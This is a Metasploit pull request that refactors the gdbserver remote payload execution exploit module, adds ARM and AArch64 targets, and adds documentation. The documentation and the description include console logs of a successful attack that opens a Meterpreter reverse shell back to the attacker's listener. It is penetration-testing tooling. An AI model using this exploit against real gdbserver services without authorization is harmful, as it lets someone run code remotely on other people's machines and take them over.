### PR TITLE
gdb_server_exec: Cleanup and add support for armle/aarch64 architectures

### DIFF
--- a/documentation/modules/exploit/multi/gdb/gdb_server_exec.md
+++ b/documentation/modules/exploit/multi/gdb/gdb_server_exec.md
@@ -1,0 +1,65 @@
+## Vulnerable Application
+
+This module attempts to execute an arbitrary payload on a loose
+[gdbserver](https://sourceware.org/gdb/onlinedocs/gdb/Server.html) service.
+
+## Installation Steps
+
+Install gdbserver:
+
+```
+apt-get install gdbserver
+```
+
+## Verification Steps
+
+Start gdbserver on a TCP port:
+
+```
+gdbserver 0.0.0.0:1234 /bin/true
+```
+
+1. Start msfconsole
+1. Do: `use exploit/multi/gdb/gdb_server_exec`
+1. Do: `set RHOSTS <ip>`
+1. Do: `set RPORT <port>`
+1. Do: `run`
+1. You should get a session.
+
+## Options
+
+## Scenarios
+
+### gdbserver 10.2 on Ubuntu 20.04 (x86_64)
+
+```
+msf6 > use exploit/multi/gdb/gdb_server_exec
+[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
+msf6 exploit(multi/gdb/gdb_server_exec) > set rhosts 192.168.200.135
+rhosts => 192.168.200.135
+msf6 exploit(multi/gdb/gdb_server_exec) > set rport 1234
+rport => 1234
+msf6 exploit(multi/gdb/gdb_server_exec) > set target x86_64
+target => x86_64
+msf6 exploit(multi/gdb/gdb_server_exec) > set payload linux/x64/meterpreter/reverse_tcp 
+payload => linux/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/gdb/gdb_server_exec) > run
+
+[*] Started reverse TCP handler on 192.168.200.130:4444 
+[*] 192.168.200.135:1234 - Performing handshake with gdbserver...
+[*] 192.168.200.135:1234 - Stepping program to find PC...
+[*] 192.168.200.135:1234 - Writing payload at 00007ffff7fd0103...
+[*] 192.168.200.135:1234 - Executing the payload...
+[*] Sending stage (3020772 bytes) to 192.168.200.135
+[*] Meterpreter session 1 opened (192.168.200.130:4444 -> 192.168.200.135:33198 ) at 2022-04-16 16:21:14 -0400
+
+meterpreter > getuid
+Server username: user
+meterpreter > sysinfo
+Computer     : 192.168.200.135
+OS           : Ubuntu 20.04 (Linux 5.13.0-35-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```

--- a/lib/msf/core/exploit/remote/gdb.rb
+++ b/lib/msf/core/exploit/remote/gdb.rb
@@ -29,7 +29,9 @@ module Exploit::Remote::Gdb
   # Maps index of register in GDB that holds $PC to architecture
   PC_REGISTERS = {
     '08' => ARCH_X86,
-    '10' => ARCH_X64
+    '0f' => ARCH_ARMLE,
+    '10' => ARCH_X64,
+    '20' => ARCH_AARCH64
   }
 
   # Send an ACK packet
@@ -166,7 +168,7 @@ module Exploit::Remote::Gdb
     read_response(decode: true)
   end
 
-  def run(filename)
+  def run_file(filename)
     send_cmd "vRun;#{Rex::Text.to_hex(filename, '')}"
     read_response
   end

--- a/modules/exploits/multi/gdb/gdb_server_exec.rb
+++ b/modules/exploits/multi/gdb/gdb_server_exec.rb
@@ -9,32 +9,42 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::Gdb
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'          => 'GDB Server Remote Payload Execution',
-      'Description'   => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'GDB Server Remote Payload Execution',
+        'Description' => %q{
           This module attempts to execute an arbitrary payload on a loose gdbserver service.
-      },
-      'Author'        => [ 'joev' ],
-      'Targets'       => [
-        [ 'x86 (32-bit)',    { 'Arch' => ARCH_X86 } ],
-        [ 'x86_64 (64-bit)', { 'Arch' => ARCH_X64 } ]
-      ],
-      'References'     =>
-        [
+        },
+        'Author' => [ 'joev' ],
+        'Targets' => [
+          [ 'x86', { 'Arch' => ARCH_X86 } ],
+          [ 'x86_64', { 'Arch' => ARCH_X64 } ],
+          [ 'ARMLE', { 'Arch' => ARCH_ARMLE } ],
+          [ 'AARCH64', { 'Arch' => ARCH_AARCH64 } ],
+        ],
+        'References' => [
           ['URL', 'https://github.com/rapid7/metasploit-framework/pull/3691']
         ],
-      'DisclosureDate' => '2014-08-24',
-      'Platform'      => %w(linux unix osx),
-      'DefaultTarget' => 0,
-      'DefaultOptions' => {
-        'PrependFork' => true
-      }
-    ))
+        'DisclosureDate' => '2014-08-24',
+        'Platform' => %w[linux unix osx],
+        'Arch' => [ARCH_X86, ARCH_X64, ARCH_ARMLE, ARCH_AARCH64],
+        'Notes' => {
+          'SideEffects' => [IOC_IN_LOGS],
+          'Stability' => [CRASH_SERVICE_DOWN, SERVICE_RESOURCE_LOSS],
+          'Reliability' => [REPEATABLE_SESSION]
+        },
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'PrependFork' => true
+        }
+      )
+    )
 
     register_options([
       OptString.new('EXE_FILE', [
         false,
-        "The exe to spawn when gdbserver is not attached to a process.",
+        'The exe to spawn when gdbserver is not attached to a process.',
         '/bin/true'
       ])
     ])
@@ -43,35 +53,40 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     connect
 
-    print_status "Performing handshake with gdbserver..."
+    print_status('Performing handshake with gdbserver...')
     handshake
 
-    enable_extended_mode
+    res = enable_extended_mode
+    if res !~ /OK/
+      fail_with(Failure::UnexpectedReply, 'Could not enable extended mode.')
+    end
 
     begin
-      print_status "Stepping program to find PC..."
+      print_status('Stepping program to find PC...')
       gdb_data = process_info
     rescue BadAckError, BadResponseError
       # gdbserver is running with the --multi flag and is not currently
       # attached to any process. let's attach to /bin/true or something.
-      print_status "No process loaded, attempting to load /bin/true..."
-      run(datastore['EXE_FILE'])
+      print_status("No process loaded, attempting to load #{datastore['EXE_FILE']}...")
+      res = run_file(datastore['EXE_FILE'])
+      if res !~ /OK/
+        fail_with(Failure::UnexpectedReply, 'Could not load new program.')
+      end
       gdb_data = process_info
     end
 
     gdb_pc, gdb_arch = gdb_data.values_at(:pc, :arch)
 
-    unless payload.arch.include? gdb_arch
+    unless payload.arch.include?(gdb_arch)
       fail_with(Failure::BadConfig, "The payload architecture is incorrect: the payload is #{payload.arch.first}, but #{gdb_arch} was detected from gdb.")
     end
 
-    print_status "Writing payload at #{gdb_pc}..."
+    print_status("Writing payload at #{gdb_pc}...")
     write(payload.encoded, gdb_pc)
 
-    print_status "Executing the payload..."
-    continue
-
-    handler
-    disconnect
+    print_status('Executing the payload...')
+    continue({read: false})
+  ensure
+    disconnect if sock
   end
 end


### PR DESCRIPTION
* Add support for armle and aarch64 architectures
* Add error handling
* Resolve rubocop / msftidy violations
* Add documentation
* Add `Notes` to module meta info.
* Define `Arch` module meta info. This fixes a bug where x64 payloads were not selectable even when the `x86_64` target was selected.
* Rename `Remote::Gdb.run` to `Remote::Gdb.run_file`. This fixes a bug where this mixin would clobber the `run` method when imported. `run_file` as a method name seemed like a good fit - it is similar to the associated gdb command (`remote exec-file`) and protocol verb (`vRun`).

This PR does *not* fix a bug which causes gdbserver to crash (causing the module to crash with `EOFError`) if the gdbserver was not already attached to a program. The existing module code implies this used to work, yet this resulted in the server crashing on most systems I tested. This is due to trying to step through a non-existing process (with `Remote::Gdb.step`) to find the process info - clearly a fool's errand. We could probably query for process info (thread info?) instead of stepping blindly, but I'll leave that as an excercise for someone else.

Note: If you're testing on ARM64, be aware that there's a bug in gdbserver patched only a few months ago in version 11.2: https://sourceware.org/bugzilla/show_bug.cgi?id=28355

I tried this module on mipsel and it failed for reasons I didn't bother to investigate.

# Success

Ubuntu 20.04.

```
msf6 > use exploit/multi/gdb/gdb_server_exec
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/gdb/gdb_server_exec) > set rhosts 192.168.200.135
rhosts => 192.168.200.135
msf6 exploit(multi/gdb/gdb_server_exec) > set rport 1234
rport => 1234
msf6 exploit(multi/gdb/gdb_server_exec) > set target x86_64
target => x86_64
msf6 exploit(multi/gdb/gdb_server_exec) > set payload linux/x64/meterpreter/reverse_tcp 
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/gdb/gdb_server_exec) > run

[*] Started reverse TCP handler on 192.168.200.130:4444 
[*] 192.168.200.135:1234 - Performing handshake with gdbserver...
[*] 192.168.200.135:1234 - Stepping program to find PC...
[*] 192.168.200.135:1234 - Writing payload at 00007ffff7fd0103...
[*] 192.168.200.135:1234 - Executing the payload...
[*] Sending stage (3020772 bytes) to 192.168.200.135
[*] Meterpreter session 1 opened (192.168.200.130:4444 -> 192.168.200.135:33198 ) at 2022-04-16 16:21:14 -0400

meterpreter > getuid
Server username: user
meterpreter > sysinfo
Computer     : 192.168.200.135
OS           : Ubuntu 20.04 (Linux 5.13.0-35-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

```


# Failure

Tested on a server with limited featurs (ie, no support for `extended-remote`).

Note supported features include only `features:read+;vContSupported+;multiprocess`.

```
msf6 exploit(multi/gdb/gdb_server_exec) > rexploit
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.200.130:4444 
[*] 192.168.200.135:1234 - Performing handshake with gdbserver...
[*] 192.168.200.135:1234 - Sending cmd: $qSupported:multiprocess+;qRelocInsn+;qvCont+;#46
[*] 192.168.200.135:1234 - Received ack...
[*] 192.168.200.135:1234 - Result: $PacketSize=1000;qXfer:features:read+;vContSupported+;multiprocess+#92
[*] 192.168.200.135:1234 - Sending ack...
[*] 192.168.200.135:1234 - Sending cmd: $!#21
[*] 192.168.200.135:1234 - Received ack...
[*] 192.168.200.135:1234 - Result: $OK#9a
[*] 192.168.200.135:1234 - Sending ack...
[*] 192.168.200.135:1234 - Stepping program to find PC...
[*] 192.168.200.135:1234 - Sending cmd: $vCont;s#b8
[*] 192.168.200.135:1234 - Received ack...
[*] 192.168.200.135:1234 - Before decoding: $T05thread:p01.01;#06
[*] 192.168.200.135:1234 - Result: $T05thread:p01.01;#06
[*] 192.168.200.135:1234 - Sending ack...
[*] 192.168.200.135:1234 - No process loaded, attempting to load /bin/true...
[*] 192.168.200.135:1234 - Sending cmd: $vRun;2f62696e2f74727565#33
[*] 192.168.200.135:1234 - Received ack...
[*] 192.168.200.135:1234 - Result: $#00
[*] 192.168.200.135:1234 - Sending ack...
[-] 192.168.200.135:1234 - Exploit aborted due to failure: unexpected-reply: Could not load new program.
[*] Exploit completed, but no session was created.
```
